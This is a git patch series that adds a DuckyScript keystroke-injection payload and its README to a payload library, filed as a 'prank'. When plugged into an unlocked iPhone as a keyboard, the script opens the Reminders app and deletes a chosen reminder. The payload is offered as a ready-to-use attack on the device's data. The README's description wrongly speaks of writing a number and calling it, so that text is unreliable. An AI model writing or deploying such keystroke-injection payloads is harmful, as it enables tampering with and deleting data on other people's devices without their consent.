From e64621af958db75271dc92865d21700a1c197cbb Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 6 Jul 2023 08:29:03 +0200 Subject: [PATCH 1/6] Delete A Reminder With An iPhone --- .../payload.txt | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt diff --git a/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt b/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt new file mode 100644 index 000000000..f496dc03f --- /dev/null +++ b/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt @@ -0,0 +1,39 @@ +REM ##################################################### +REM # | +REM # Title : Delete A Reminder With An iPhone | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Prank | +REM # Target : iPhone | +REM # | +REM ##################################################### + + +REM Requirements: +REM - The phone must be unlocked + +REM Tested on: +REM - iPhone 14 +REM - iOS 16.4.1 + +GUI SPACE +DELAY 300 + +REM You need to change the name of the application according to the language you have on your phone. +STRING #REMINDER-APP-NAME +ENTER +DELAY 2000 +GUI f +DELAY 1000 + +REM You should know the reminder name that you want to delete +STRING #REMINDER-NAME +DELAY 500 +TAB +DELAY 500 +GUI a +BACKSPACE +DELAY 500 +ENTER +DELAY 500 +GUI h From 54e21761bced62f965234b36d3bc8197b5d93494 Mon Sep 17 00:00:00 2001 From: aleff-github Date: Thu, 6 Jul 2023 08:37:30 +0200 Subject: [PATCH 2/6] Create README.md --- .../README.md | 56 +++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 payloads/library/prank/Delete_A_Reminder_With_An_iPhone/README.md diff --git a/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/README.md b/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/README.md new file mode 100644 index 000000000..04fc56f16 --- /dev/null +++ b/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/README.md @@ -0,0 +1,56 @@ +# Delete A Reminder With An iPhone + +This script can be used to delete a reminder really fast using an iPhone, so iOS system. + +**Category**: Prank + +## Description + +This script can be used to delete a reminder really fast using an iPhone, so iOS system. + +Open search bar, then open the Reminder app (I used the italian name so 'Promemoria'), then delete what is (hidden) stored and write the number, then call it. + +## Dependencies + +* The phone must be unlocked + +## Test + +- iPhone 14 +- iOS 16.4.1 + +## Settings + +- You need to change the name of the application according to the language you have on your phone. + + ```DuckyScript + STRING #REMINDER-APP-NAME + ``` + +- You should know the reminder name that you want to delete + +```DuckyScript + STRING #REMINDER-NAME +``` + +## Credits + +

Aleff :octocat:

+
+ + + + + +
+ + + +
Github +
+ + + +
Linkedin +
+
\ No newline at end of file From 8d81bcac30ecefda1500dbb1b12818ef0d888f86 Mon Sep 17 00:00:00 2001 From: Aleff Date: Sat, 22 Jul 2023 09:48:20 +0200 Subject: [PATCH 3/6] QUACKed --- .../payload.txt | 34 +++++++++---------- 1 file changed, 17 insertions(+), 17 deletions(-) diff --git a/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt b/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt index f496dc03f..8e041da9c 100644 --- a/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt +++ b/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt @@ -16,24 +16,24 @@ REM Tested on: REM - iPhone 14 REM - iOS 16.4.1 -GUI SPACE -DELAY 300 +QUACK GUI SPACE +QUACK DELAY 300 REM You need to change the name of the application according to the language you have on your phone. -STRING #REMINDER-APP-NAME -ENTER -DELAY 2000 -GUI f -DELAY 1000 +QUACK STRING #REMINDER-APP-NAME +QUACK ENTER +QUACK DELAY 2000 +QUACK GUI f +QUACK DELAY 1000 REM You should know the reminder name that you want to delete -STRING #REMINDER-NAME -DELAY 500 -TAB -DELAY 500 -GUI a -BACKSPACE -DELAY 500 -ENTER -DELAY 500 -GUI h +QUACK STRING #REMINDER-NAME +QUACK DELAY 500 +QUACK TAB +QUACK DELAY 500 +QUACK GUI a +QUACK BACKSPACE +QUACK DELAY 500 +QUACK ENTER +QUACK DELAY 500 +QUACK GUI h From ad89417ef5f0f69eef076ba6c9b0c708393c2252 Mon Sep 17 00:00:00 2001 From: Aleff Date: Sat, 22 Jul 2023 11:02:12 +0200 Subject: [PATCH 4/6] Update payload.txt --- .../payload.txt | 32 +++++++++---------- 1 file changed, 16 insertions(+), 16 deletions(-) diff --git a/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt b/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt index 8e041da9c..344c7ea5f 100644 --- a/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt +++ b/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt @@ -1,32 +1,32 @@ -REM ##################################################### -REM # | -REM # Title : Delete A Reminder With An iPhone | -REM # Author : Aleff | -REM # Version : 1.0 | -REM # Category : Prank | -REM # Target : iPhone | -REM # | -REM ##################################################### +* REM ##################################################### +* REM # | +* REM # Title : Delete A Reminder With An iPhone | +* REM # Author : Aleff | +* REM # Version : 1.0 | +* REM # Category : Prank | +* REM # Target : iPhone | +* REM # | +* REM ##################################################### -REM Requirements: -REM - The phone must be unlocked +* REM Requirements: +* REM - The phone must be unlocked -REM Tested on: -REM - iPhone 14 -REM - iOS 16.4.1 +* REM Tested on: +* REM - iPhone 14 +* REM - iOS 16.4.1 QUACK GUI SPACE QUACK DELAY 300 -REM You need to change the name of the application according to the language you have on your phone. +* REM You need to change the name of the application according to the language you have on your phone. QUACK STRING #REMINDER-APP-NAME QUACK ENTER QUACK DELAY 2000 QUACK GUI f QUACK DELAY 1000 -REM You should know the reminder name that you want to delete +* REM You should know the reminder name that you want to delete QUACK STRING #REMINDER-NAME QUACK DELAY 500 QUACK TAB From d2220830a0cd2ee97e74f6afa9944234252b3780 Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 6 Jun 2024 18:07:06 +0200 Subject: [PATCH 5/6] Adapted to the use of variables --- .../Delete_A_Reminder_With_An_iPhone/README.md | 11 +++-------- .../payload.txt | 18 +++++++++--------- 2 files changed, 12 insertions(+), 17 deletions(-) diff --git a/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/README.md b/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/README.md index 04fc56f16..0494bdb3b 100644 --- a/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/README.md +++ b/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/README.md @@ -14,28 +14,23 @@ Open search bar, then open the Reminder app (I used the italian name so 'Promemo * The phone must be unlocked -## Test - -- iPhone 14 -- iOS 16.4.1 - ## Settings - You need to change the name of the application according to the language you have on your phone. ```DuckyScript - STRING #REMINDER-APP-NAME + REMINDER-APP-NAME='Promemoria' ``` - You should know the reminder name that you want to delete ```DuckyScript - STRING #REMINDER-NAME + REMINDER-NAME='example' ``` ## Credits -

Aleff :octocat:

+

Aleff

diff --git a/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt b/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt index 344c7ea5f..31e4d3f5b 100644 --- a/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt +++ b/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt @@ -8,26 +8,26 @@ * REM # | * REM ##################################################### +ATTACKMODE HID * REM Requirements: * REM - The phone must be unlocked -* REM Tested on: -* REM - iPhone 14 -* REM - iOS 16.4.1 +QUACK REM VARIABLES +* REM 1) You need to change the name of the application according to the language you have on your phone. +REMINDER-APP-NAME='Promemoria' +* REM 2) You should know the reminder name that you want to delete +REMINDER-NAME='example' +QUACK DELAY 1500 QUACK GUI SPACE QUACK DELAY 300 - -* REM You need to change the name of the application according to the language you have on your phone. -QUACK STRING #REMINDER-APP-NAME +QUACK STRING $REMINDER-APP-NAME QUACK ENTER QUACK DELAY 2000 QUACK GUI f QUACK DELAY 1000 - -* REM You should know the reminder name that you want to delete -QUACK STRING #REMINDER-NAME +QUACK STRING $REMINDER-NAME QUACK DELAY 500 QUACK TAB QUACK DELAY 500 From 01073810423590c7ab471e7a8dcfb3bf21ffdd5a Mon Sep 17 00:00:00 2001 From: Aleff Date: Sun, 9 Jun 2024 12:09:39 +0200 Subject: [PATCH 6/6] Update payload.txt --- .../Delete_A_Reminder_With_An_iPhone/payload.txt | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt b/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt index 31e4d3f5b..a606bff23 100644 --- a/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt +++ b/payloads/library/prank/Delete_A_Reminder_With_An_iPhone/payload.txt @@ -1,11 +1,11 @@ * REM ##################################################### -* REM # | -* REM # Title : Delete A Reminder With An iPhone | -* REM # Author : Aleff | -* REM # Version : 1.0 | -* REM # Category : Prank | -* REM # Target : iPhone | -* REM # | +* REM # # +* REM # Title : Delete A Reminder With An iPhone # +* REM # Author : Aleff # +* REM # Version : 1.0 # +* REM # Category : Prank # +* REM # Target : iPhone # +* REM # # * REM ##################################################### ATTACKMODE HID